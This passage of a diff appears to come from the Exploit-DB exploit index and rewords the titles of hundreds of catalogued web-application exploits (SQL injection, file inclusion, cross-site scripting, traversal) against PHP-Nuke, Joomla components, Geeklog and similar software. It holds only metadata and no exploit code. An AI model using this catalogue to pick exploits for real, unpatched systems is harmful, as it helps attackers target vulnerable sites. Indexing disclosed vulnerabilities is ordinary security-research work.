- 'add_rating.php?id' Blind SQL Injection",2012-09-02,DaOne,php,webapps,0 21022,platforms/php/webapps/21022.txt,"PHPLib Team PHPLIB 7.2 - Remote Script Execution",2001-07-21,"giancarlo pinerolo",php,webapps,0 21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0 21038,platforms/php/webapps/21038.txt,"PHP-Nuke 5.0 - 'user.php' Form Element Substitution",2001-07-27,dinopio,php,webapps,0 21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - SQL Query Manipulation",2001-08-03,kill-9,php,webapps,0 -21833,platforms/php/webapps/21833.rb,"PhpTax - 'pfilez' Parameter Exec Remote Code Injection (Metasploit)",2012-10-10,Metasploit,php,webapps,0 +21833,platforms/php/webapps/21833.rb,"PhpTax - 'pfilez' Execution Remote Code Injection (Metasploit)",2012-10-10,Metasploit,php,webapps,0 21052,platforms/jsp/webapps/21052.txt,"jira 4.4.3 / greenhopper < 5.9.8 - Multiple Vulnerabilities",2012-09-04,"Hoyt LLC Research",jsp,webapps,0 21053,platforms/multiple/webapps/21053.txt,"Splunk 4.3.3 - Arbitrary File Read",2012-09-04,"Marcio Almeida",multiple,webapps,0 21054,platforms/php/webapps/21054.txt,"Support4Arabs Pages 2.0 - SQL Injection",2012-09-04,L0n3ly-H34rT,php,webapps,0 @@ -26484,8 +26485,8 @@ id,file,description,date,author,platform,type,port 21135,platforms/php/webapps/21135.txt,"TestLink 1.9.3 - Cross-Site Request Forgery",2012-09-07,"High-Tech Bridge SA",php,webapps,0 21148,platforms/php/webapps/21148.txt,"Pinterest Clone Script - Multiple Vulnerabilities",2012-09-08,DaOne,php,webapps,0 21157,platforms/php/webapps/21157.txt,"bharat Mediratta Gallery 1.1/1.2 - Directory Traversal",2001-11-19,"Cabezon Aurelien",php,webapps,0 -21165,platforms/php/webapps/21165.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - user.php uname Parameter Cross-Site Scripting",2001-12-03,"Cabezon Aurélien",php,webapps,0 -21166,platforms/php/webapps/21166.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - modules.php Multiple Parameter Cross-Site Scripting",2001-12-03,"Cabezon Aurélien",php,webapps,0 +21165,platforms/php/webapps/21165.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - 'user.php?uname' Cross-Site Scripting",2001-12-03,"Cabezon Aurélien",php,webapps,0 +21166,platforms/php/webapps/21166.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2001-12-03,"Cabezon Aurélien",php,webapps,0 21168,platforms/php/webapps/21168.txt,"EasyNews 1.5 - NewsDatabase/Template Modification",2001-12-01,"markus arndt",php,webapps,0 21184,platforms/cgi/webapps/21184.txt,"Agora.CGI 3.x/4.0 - Debug Mode Cross-Site Scripting",2001-12-17,"Tamer Sahin",cgi,webapps,0 21187,platforms/cgi/webapps/21187.txt,"Aktivate 1.0 3 - Shopping Cart Cross-Site Scripting",2001-12-18,"Tamer Sahin",cgi,webapps,0 @@ -26494,7 +26495,7 @@ id,file,description,date,author,platform,type,port 21208,platforms/cgi/webapps/21208.txt,"YaBB 9.1.2000 - Cross-Agent Scripting",2002-01-09,Obscure,cgi,webapps,0 21209,platforms/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting",2002-01-09,Obscure,cgi,webapps,0 21220,platforms/php/webapps/21220.txt,"VICIDIAL Call Center Suite 2.2.1-237 - Multiple Vulnerabilities",2012-09-10,"Sepahan TelCom IT Group",php,webapps,0 -21221,platforms/php/webapps/21221.txt,"Joomla! Component RokModule 1.1 - 'module' Parameter Blind SQL Injection",2012-09-10,Yarolinux,php,webapps,0 +21221,platforms/php/webapps/21221.txt,"Joomla! Component RokModule 1.1 - 'module' Blind SQL Injection",2012-09-10,Yarolinux,php,webapps,0 21222,platforms/php/webapps/21222.txt,"SiteGo - Remote File Inclusion",2012-09-10,L0n3ly-H34rT,php,webapps,0 21230,platforms/php/webapps/21230.txt,"PHP-Nuke 4.x/5.x - Arbitrary File Inclusion",2002-01-16,"Handle Nopman",php,webapps,0 21233,platforms/php/webapps/21233.txt,"PHP-Nuke 4.x/5.x - SQL_Debug Information Disclosure",2002-01-18,zataz.com,php,webapps,0 @@ -26562,7 +26563,7 @@ id,file,description,date,author,platform,type,port 21433,platforms/cgi/webapps/21433.txt,"MyGuestbook 1.0 - Script Injection",2002-04-30,BrainRawt,cgi,webapps,0 21434,platforms/asp/webapps/21434.txt,"Outfront Spooky 2.x - Login SQL Query Manipulation Password",2002-05-02,anonymous,asp,webapps,0 21435,platforms/cgi/webapps/21435.txt,"askSam 4.0 Web Publisher - Cross-Site Scripting",2002-05-05,frog,cgi,webapps,0 -21436,platforms/php/webapps/21436.txt,"B2 0.6 - b2edit.showposts.php b2inc Parameter Remote File Inclusion",2002-05-06,Frank,php,webapps,0 +21436,platforms/php/webapps/21436.txt,"B2 0.6 - 'b2edit.showposts.php?b2inc' Remote File Inclusion",2002-05-06,Frank,php,webapps,0 21447,platforms/php/webapps/21447.txt,"XMB Forum 1.6 - Magic Lantern Cross-Site Scripting",2002-05-11,frog,php,webapps,0 21448,platforms/php/webapps/21448.txt,"XMB Forum 1.6 - Magic Lantern Log File",2002-05-11,frog,php,webapps,0 21449,platforms/php/webapps/21449.txt,"NOCC 0.9.x - Webmail Script Injection",2002-05-14,ppp-design,php,webapps,0 @@ -26588,7 +26589,7 @@ id,file,description,date,author,platform,type,port 21514,platforms/php/webapps/21514.txt,"Splatt Forum 3.0 - Image Tag HTML Injection",2002-06-06,MegaHz,php,webapps,0 21517,platforms/php/webapps/21517.txt,"Voxel Dot Net CBms 0.x - Multiple Code Injection Vulnerabilities",2002-06-06,"Ulf Harnhammar",php,webapps,0 21519,platforms/php/webapps/21519.txt,"MyHelpDesk 20020509 - HTML Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 -21524,platforms/php/webapps/21524.txt,"ViArt Shop Evaluation 4.1 - Multiple Remote File Inclusion",2012-09-26,L0n3ly-H34rT,php,webapps,0 +21524,platforms/php/webapps/21524.txt,"ViArt Shop Evaluation 4.1 - Multiple Remote File Inclusions",2012-09-26,L0n3ly-H34rT,php,webapps,0 21525,platforms/php/webapps/21525.txt,"Geeklog 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21526,platforms/php/webapps/21526.txt,"MyHelpDesk 20020509 - Cross-Site Scripting",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21527,platforms/php/webapps/21527.txt,"MyHelpDesk 20020509 - SQL Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 @@ -26658,7 +26659,7 @@ id,file,description,date,author,platform,type,port 21779,platforms/php/webapps/21779.txt,"WoltLab Burning Board 2.0 - SQL Injection",2002-09-09,Cano2,php,webapps,0 21780,platforms/php/webapps/21780.txt,"phpGB 1.1 - HTML Injection",2002-09-09,ppp-design,php,webapps,0 21783,platforms/php/webapps/21783.txt,"PHPGB 1.1/1.2 - PHP Code Injection",2002-09-09,ppp-design,php,webapps,0 -21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - 'index.php month' Parameter SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 +21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - 'index.php?month' SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 21802,platforms/cgi/webapps/21802.txt,"Lycos HTMLGear - guestGear CSS HTML Injection",2002-09-17,"Matthew Murphy",cgi,webapps,0 21809,platforms/php/webapps/21809.txt,"Web Help Desk by SolarWinds - Persistent Cross-Site Scripting",2012-10-08,loneferret,php,webapps,0 21811,platforms/php/webapps/21811.txt,"SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-19,"DarC KonQuest",php,webapps,0 @@ -26715,8 +26716,8 @@ id,file,description,date,author,platform,type,port 21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 - 'Form_Header.php' Cross-Site Scripting",2002-10-23,qber66,php,webapps,0 21962,platforms/cgi/webapps/21962.txt,"Mojo Mail 2.7 - Email Form Cross-Site Scripting",2002-10-24,"Daniel Boland",cgi,webapps,0 21966,platforms/cgi/webapps/21966.txt,"MailReader.com 2.3.x - NPH-MR.cgi File Disclosure",2002-10-28,pokleyzz,cgi,webapps,0 -21967,platforms/php/webapps/21967.txt,"Benjamin Lefevre Dobermann Forum 0.x - entete.php subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 -21968,platforms/php/webapps/21968.txt,"Benjamin Lefevre Dobermann Forum 0.x - enteteacceuil.php subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 +21967,platforms/php/webapps/21967.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'entete.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps,0 +21968,platforms/php/webapps/21968.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'enteteacceuil.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps,0 21969,platforms/php/webapps/21969.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'index.php' subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 21970,platforms/php/webapps/21970.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'newtopic.php' subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 21976,platforms/php/webapps/21976.txt,"Jason Orcutt Prometheus 3.0/4.0/6.0 - Remote File Inclusion",2002-11-01,"Karol Wiesek",php,webapps,0 @@ -26726,8 +26727,8 @@ id,file,description,date,author,platform,type,port 21990,platforms/php/webapps/21990.txt,"airVisionNVR 1.1.13 - 'readfile()' Disclosure / SQL Injection",2012-10-15,pennyGrit,php,webapps,0 21992,platforms/hardware/webapps/21992.txt,"BigPond 3G21WB - Multiple Vulnerabilities",2012-10-15,"Roberto Paleari",hardware,webapps,0 21995,platforms/cgi/webapps/21995.txt,"CuteCast 1.2 - User Credential Disclosure",2002-11-07,Zero-X,cgi,webapps,0 -22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - 'albums.php album' Parameter SQL Injection",2012-10-16,Zixem,php,webapps,0 -22004,platforms/php/webapps/22004.txt,"Joomla! Component com_icagenda - 'id' Parameter Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 +22003,platforms/php/webapps/22003.txt,"MyBB Profile Albums Plugin 0.9 - 'albums.php?album' SQL Injection",2012-10-16,Zixem,php,webapps,0 +22004,platforms/php/webapps/22004.txt,"Joomla! Component com_icagenda - 'id' Multiple Vulnerabilities",2012-10-16,Dark-Puzzle,php,webapps,0 22005,platforms/hardware/webapps/22005.txt,"Visual Tools DVR3.0.6.16_ vx series 4.2.19.2 - Multiple Vulnerabilities",2012-10-16,"Andrea Fabrizi",hardware,webapps,0 22009,platforms/php/webapps/22009.txt,"EZ Systems HTTPBench 1.1 - Information Disclosure",2002-11-11,"Tacettin Karadeniz",php,webapps,0 22015,platforms/cgi/webapps/22015.txt,"W3Mail 1.0.6 - File Disclosure",2002-11-12,"Tim Brown",cgi,webapps,0 @@ -26762,7 +26763,7 @@ id,file,description,date,author,platform,type,port 22090,platforms/php/webapps/22090.txt,"PHP-Nuke 6.0 - Web Mail Script Injection",2002-12-16,"Ulf Harnhammar",php,webapps,0 22092,platforms/multiple/webapps/22092.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Directory Traversal",2012-10-19,xistence,multiple,webapps,0 22097,platforms/php/webapps/22097.txt,"Joomla! Component com_fss 1.9.1.1447 - SQL Injection",2012-10-19,D4NB4R,php,webapps,0 -22098,platforms/php/webapps/22098.txt,"Joomla! Component com_tag - 'tag' Parameter SQL Injection",2012-10-19,D4NB4R,php,webapps,0 +22098,platforms/php/webapps/22098.txt,"Joomla! Component com_tag - 'tag' SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22099,platforms/php/webapps/22099.txt,"CMSQLite 1.3.2 - Multiple Vulnerabilities",2012-10-19,Vulnerability-Lab,php,webapps,0 22102,platforms/php/webapps/22102.txt,"PHP-Nuke 6.0 - Multiple Full Path Disclosure Vulnerabilities",2002-12-16,frog,php,webapps,0 22103,platforms/php/webapps/22103.txt,"PHP-Nuke 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2002-12-16,frog,php,webapps,0 @@ -26772,11 +26773,11 @@ id,file,description,date,author,platform,type,port 22109,platforms/php/webapps/22109.txt,"W-Agora 4.1.6 - EditForm.php Cross-Site Scripting",2002-12-22,xatr0z,php,webapps,0 22111,platforms/cgi/webapps/22111.pl,"CHETCPASSWD 1.12 - Shadow File Disclosure",2002-12-22,"Victor Pereira",cgi,webapps,0 22114,platforms/php/webapps/22114.txt,"PEEL 1.0b - Remote File Inclusion",2002-12-31,frog,php,webapps,0 -22115,platforms/php/webapps/22115.txt,"N/X Web Content Management System 2002 Prerelease 1 - menu.inc.php c_path Parameter Remote File Inclusion",2003-01-02,frog,php,webapps,0 -22116,platforms/php/webapps/22116.txt,"N/X Web Content Management System 2002 Prerelease 1 - datasets.php c_path Parameter Local File Inclusion",2003-01-02,frog,php,webapps,0 +22115,platforms/php/webapps/22115.txt,"N/X Web Content Management System 2002 Prerelease 1 - 'menu.inc.php?c_path' Remote File Inclusion",2003-01-02,frog,php,webapps,0 +22116,platforms/php/webapps/22116.txt,"N/X Web Content Management System 2002 Prerelease 1 - 'datasets.php?c_path' Local File Inclusion",2003-01-02,frog,php,webapps,0 22125,platforms/php/webapps/22125.txt,"OpenTopic 2.3.1 - Private Message HTML Injection",2003-01-06,frog,php,webapps,0 -22126,platforms/php/webapps/22126.txt,"DCP-Portal 5.0.1 - editor.php Root Parameter Remote File Inclusion",2003-01-06,frog,php,webapps,0 -22127,platforms/php/webapps/22127.txt,"DCP-Portal 5.0.1 - lib.php Root Parameter Remote File Inclusion",2003-01-06,frog,php,webapps,0 +22126,platforms/php/webapps/22126.txt,"DCP-Portal 5.0.1 - 'editor.php?Root' Remote File Inclusion",2003-01-06,frog,php,webapps,0 +22127,platforms/php/webapps/22127.txt,"DCP-Portal 5.0.1 - 'lib.php?Root' Remote File Inclusion",2003-01-06,frog,php,webapps,0 22133,platforms/php/webapps/22133.txt,"myPHPNuke 1.8.8 - 'Default_Theme' Cross-Site Scripting",2003-01-06,Mindwarper,php,webapps,0 22134,platforms/php/webapps/22134.txt,"S8Forum 3.0 - Remote Command Execution",2003-01-06,nmsh_sa,php,webapps,0 22137,platforms/cgi/webapps/22137.txt,"FormMail-Clone - Cross-Site Scripting",2003-01-09,"Rynho Zeros Web",cgi,webapps,0 @@ -26785,16 +26786,16 @@ id,file,description,date,author,platform,type,port 22149,platforms/php/webapps/22149.txt,"W-Agora 4.1.6 - 'index.php' bn Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 - 'modules.php' File Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en - Persistent Cross-Site Scripting",2012-10-22,sqlhacker,php,webapps,0 -22152,platforms/php/webapps/22152.txt,"Joomla! Component com_commedia - 'task' Parameter SQL Injection",2012-10-22,D4NB4R,php,webapps,0 -22153,platforms/php/webapps/22153.pl,"Joomla! Component com_kunena - 'search' Parameter SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 +22152,platforms/php/webapps/22152.txt,"Joomla! Component com_commedia - 'task' SQL Injection",2012-10-22,D4NB4R,php,webapps,0 +22153,platforms/php/webapps/22153.pl,"Joomla! Component com_kunena - 'search' SQL Injection",2012-10-22,D35m0nd142,php,webapps,0 22156,platforms/php/webapps/22156.txt,"WordPress Plugin White Label CMS 1.5 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-10-22,pcsjj,php,webapps,0 -22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - 'id' Parameter SQL Injection",2012-10-22,Cumi,php,webapps,0 +22157,platforms/php/webapps/22157.txt,"Schoolhos CMS Beta 2.29 - 'id' SQL Injection",2012-10-22,Cumi,php,webapps,0 22158,platforms/php/webapps/22158.txt,"WordPress Plugin social discussions 6.1.1 - Multiple Vulnerabilities",2012-10-22,waraxe,php,webapps,0 22159,platforms/php/webapps/22159.txt,"subrion CMS 2.2.1 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22160,platforms/php/webapps/22160.txt,"ATutor 1.2 - Multiple Vulnerabilities",2012-10-22,"High-Tech Bridge SA",php,webapps,0 22163,platforms/php/webapps/22163.txt,"Geeklog 1.3.7 - profiles.php Multiple Cross-Site Scripting Vulnerabilities",2003-01-14,snooq,php,webapps,0 -22164,platforms/php/webapps/22164.txt,"Geeklog 1.3.7 - users.php uid Parameter Cross-Site Scripting",2003-01-14,snooq,php,webapps,0 -22165,platforms/php/webapps/22165.txt,"Geeklog 1.3.7 - comment.php cid Parameter Cross-Site Scripting",2003-01-14,snooq,php,webapps,0 +22164,platforms/php/webapps/22164.txt,"Geeklog 1.3.7 - 'users.php?uid' Cross-Site Scripting",2003-01-14,snooq,php,webapps,0 +22165,platforms/php/webapps/22165.txt,"Geeklog 1.3.7 - 'comment.php?cid' Cross-Site Scripting",2003-01-14,snooq,php,webapps,0 22166,platforms/php/webapps/22166.txt,"Geeklog 1.3.7 - 'Homepage User' HTML Injection",2003-01-14,snooq,php,webapps,0 22167,platforms/php/webapps/22167.txt,"vAuthenticate 2.8 - SQL Injection",2003-01-14,frog,php,webapps,0 22168,platforms/php/webapps/22168.txt,"vSignup 2.1 - SQL Injection",2003-01-14,frog,php,webapps,0 @@ -26878,8 +26879,8 @@ id,file,description,date,author,platform,type,port 22393,platforms/php/webapps/22393.txt,"osCommerce 2.1/2.2 - Checkout_Payment.php Error Output Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0 22396,platforms/php/webapps/22396.txt,"WordPress Plugin bbPress - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22398,platforms/php/webapps/22398.php,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0 -22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting",2012-11-01,"CYBSEC Labs",php,webapps,0 -22403,platforms/php/webapps/22403.txt,"Joomla! Component Spider Catalog 1.1 - 'Product_ID' Parameter SQL Injection",2012-11-01,D4NB4R,php,webapps,0 +22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-11-01,"CYBSEC Labs",php,webapps,0 +22403,platforms/php/webapps/22403.txt,"Joomla! Component Spider Catalog 1.1 - 'Product_ID' SQL Injection",2012-11-01,D4NB4R,php,webapps,0 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0 22408,platforms/cgi/webapps/22408.txt,"Planetmoon - Guestbook Clear Text Password Retrieval",2003-03-21,subj,cgi,webapps,0 22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - banners.php Banner Manager Password Disclosure",2003-03-22,frog,php,webapps,0 @@ -26947,16 +26948,16 @@ id,file,description,date,author,platform,type,port 22558,platforms/php/webapps/22558.txt,"PHP-Nuke Splatt Forum 4.0 Module - HTML Injection",2003-05-01,"Morning Wood",php,webapps,0 22559,platforms/cgi/webapps/22559.pl,"Stockman Shopping Cart 7.8 - Arbitrary Command Execution",2003-05-01,"Aleksey Sintsov",cgi,webapps,0 22572,platforms/cgi/webapps/22572.pl,"HappyMall E-Commerce Software 4.3/4.4 - Member_HTML.cgi Command Execution",2003-05-08,"Revin Aldi",cgi,webapps,0 -22577,platforms/php/webapps/22577.txt,"ttCMS 2.2 / ttForum 1.1 - news.php template Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 -22578,platforms/php/webapps/22578.txt,"ttCMS 2.2 / ttForum 1.1 - install.php installdir Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 +22577,platforms/php/webapps/22577.txt,"ttCMS 2.2 / ttForum 1.1 - 'news.php?template' Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 +22578,platforms/php/webapps/22578.txt,"ttCMS 2.2 / ttForum 1.1 - 'install.php?installdir' Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22579,platforms/php/webapps/22579.txt,"Phorum 3.4.x - 'Message Form' HTML Injection",2003-05-09,WiciU,php,webapps,0 22583,platforms/asp/webapps/22583.pl,"Snitz Forums 2000 - register.asp SQL Injection",2003-05-10,sharpiemarker,asp,webapps,0 22588,platforms/cgi/webapps/22588.txt,"Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi Cross-Site Scripting",2003-05-12,"Julio Cesar",cgi,webapps,0 22589,platforms/php/webapps/22589.txt,"PHP-Nuke 5.x/6.x Web_Links Module - SQL Injection",2003-05-12,"Albert Puigsech Galicia",php,webapps,0 22590,platforms/php/webapps/22590.txt,"NetOffice Dwins 1.4p3 - SQL Injection",2012-11-09,dun,php,webapps,0 22592,platforms/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.cgi File Disclosure",2003-05-12,"Julio Cesar",cgi,webapps,0 -22595,platforms/php/webapps/22595.txt,"PHP-Nuke 6.5 - modules.php 'Username' URI Parameter Cross-Site Scripting",2003-05-13,"Ferruh Mavituna",php,webapps,0 -22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 - (Multiple Downloads Module) SQL Injection",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 +22595,platforms/php/webapps/22595.txt,"PHP-Nuke 6.5 - 'modules.php?Username' Cross-Site Scripting",2003-05-13,"Ferruh Mavituna",php,webapps,0 +22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 (Multiple Downloads Module) - SQL Injection",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module - Full Path Disclosure",2003-05-13,"Rynho Zeros Web",php,webapps,0 22599,platforms/php/webapps/22599.html,"vBulletin 3.0 - Private Message HTML Injection",2003-05-14,"Ferruh Mavituna",php,webapps,0 22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,php,webapps,0 @@ -26972,7 +26973,7 @@ id,file,description,date,author,platform,type,port 22641,platforms/php/webapps/22641.txt,"BLNews 2.1.3 - Remote File Inclusion",2003-05-24,Over_G,php,webapps,0 22642,platforms/php/webapps/22642.txt,"Ultimate PHP Board 1.9 - admin_iplog.php Arbitrary PHP Execution",2003-05-24,euronymous,php,webapps,0 22651,platforms/php/webapps/22651.txt,"PostNuke 0.72x Phoenix Glossary Module - SQL Injection",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 -22654,platforms/php/webapps/22654.txt,"bananadance wiki b2.2 - Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,php,webapps,0 +22654,platforms/php/webapps/22654.txt,"Bananadance Wiki b2.2 - Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,php,webapps,0 22656,platforms/php/webapps/22656.py,"vBulletin vBay 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps,0 22663,platforms/php/webapps/22663.txt,"Newsscript 1.0 - Administrative Privilege Escalation",2003-05-27,"Peter Winter-Smith",php,webapps,0 22669,platforms/cgi/webapps/22669.txt,"Bandmin 1.4 - Cross-Site Scripting",2003-05-28,"silent needel",cgi,webapps,0 @@ -26982,8 +26983,8 @@ id,file,description,date,author,platform,type,port 22675,platforms/php/webapps/22675.txt,"Geeklog 1.3.x - Authenticated SQL Injection",2003-05-29,pokleyzz,php,webapps,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0 -22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe css' Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 -22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe css' Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 +22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 - 'nph-psf.exe?css' Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 +22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 - 'nph-psa.exe?css' Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22692,platforms/cgi/webapps/22692.txt,"Zeus Web Server 4.x - Admin Interface VS_Diag.cgi Cross-Site Scripting",2003-05-29,"Hugo Vazquez",cgi,webapps,0 22693,platforms/php/webapps/22693.txt,"cPanel 5/6 / Formail-Clone - E-Mail Restriction Bypass",2003-05-30,"Chad C. Keep",php,webapps,0 22697,platforms/asp/webapps/22697.asp,"iisCart2000 - Arbitrary File Upload",2003-05-31,Bosen,asp,webapps,0 @@ -27010,7 +27011,7 @@ id,file,description,date,author,platform,type,port 22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,cr4wl3r,php,webapps,0 22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.cgi Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0 22744,platforms/asp/webapps/22744.txt,"Synkron.Web 3.0 - HTML Injection",2003-06-06,Gyrniff,asp,webapps,0 -22746,platforms/asp/webapps/22746.txt,"Maxwebportal 1.30 - search.asp Search Parameter Cross-Site Scripting",2003-06-06,JeiAr,asp,webapps,0 +22746,platforms/asp/webapps/22746.txt,"Maxwebportal 1.30 - 'search.asp?Search' Cross-Site Scripting",2003-06-06,JeiAr,asp,webapps,0 22747,platforms/asp/webapps/22747.txt,"Maxwebportal 1.30 - Remote Database Disclosure",2003-06-06,JeiAr,asp,webapps,0 22750,platforms/php/webapps/22750.txt,"Zentrack 2.2/2.3/2.4 - 'index.php' Remote File Inclusion",2003-06-06,farking,php,webapps,0 22752,platforms/java/webapps/22752.txt,"H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",java,webapps,0 @@ -27020,7 +27021,7 @@ id,file,description,date,author,platform,type,port 22829,platforms/php/webapps/22829.txt,"weBid 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 - user.php UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",php,webapps,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0 -22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 +22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - 'view_faq.php?question' SQL Injection",2012-11-16,unsuprise,php,webapps,0 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,cgi,webapps,0 22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 - 'Lib.Inc.php' Remote File Inclusion / Command Execution",2003-06-15,frog,php,webapps,0 22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script - Code Injection",2003-06-16,"gilbert vilvoorde",cgi,webapps,0 @@ -27032,14 +27033,14 @@ id,file,description,date,author,platform,type,port 22799,platforms/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 - Web Mail ADD_ACL Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 22804,platforms/cgi/webapps/22804.txt,"Kerio MailServer 5.6.3 - Web Mail DO_MAP Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 22805,platforms/jsp/webapps/22805.txt,"Tmax Soft JEUS 3.1.4 p1 - URL.jsp Cross-Site Scripting",2003-06-17,"Jeremy Bae",jsp,webapps,0 -22808,platforms/php/webapps/22808.txt,"pMachine 1.0/2.x - '/lib/' Multiple Script Direct Request Full Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 -22809,platforms/php/webapps/22809.txt,"pMachine 1.0/2.x - Multiple Script sfx Parameter Full Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22808,platforms/php/webapps/22808.txt,"pMachine 1.0/2.x - '/lib/' Multiple Script Direct Request Full Path Disclosures",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22809,platforms/php/webapps/22809.txt,"pMachine 1.0/2.x - Multiple Script sfx Parameter Full Path Disclosures",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22810,platforms/php/webapps/22810.txt,"pMachine 1.0/2.x - Search Module Cross-Site Scripting",2003-06-19,"Lorenzo Hernandez 